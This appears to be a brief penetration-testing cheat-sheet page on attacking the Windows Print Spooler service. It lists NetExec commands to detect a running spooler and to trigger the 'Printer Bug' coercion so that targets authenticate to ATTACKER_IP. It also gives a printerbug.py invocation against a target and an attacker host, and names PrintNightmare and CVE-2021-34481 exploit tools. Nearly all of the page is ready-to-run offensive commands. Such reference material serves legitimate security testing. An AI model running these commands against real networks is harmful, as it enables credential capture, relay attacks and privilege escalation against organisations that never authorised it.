Print Spooler
Spooler is running
nxc smb <ip> -u 'user' -p 'pass' -M spooler

https://bsky.app/profile/itm4n.bsky.social/post/3lcipb7lq4k2v
Printer Bug
MisconfigurationTrustee and Resource Delegationnxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IP
or with printerbug.py
printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'
NetNTLMV1 ?
PrintNightmare
nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M spooler -M printnightmare
Itwasalladream
Exploit
Windows ExploitCVE-2021-34481
SpoolSploit
Last updated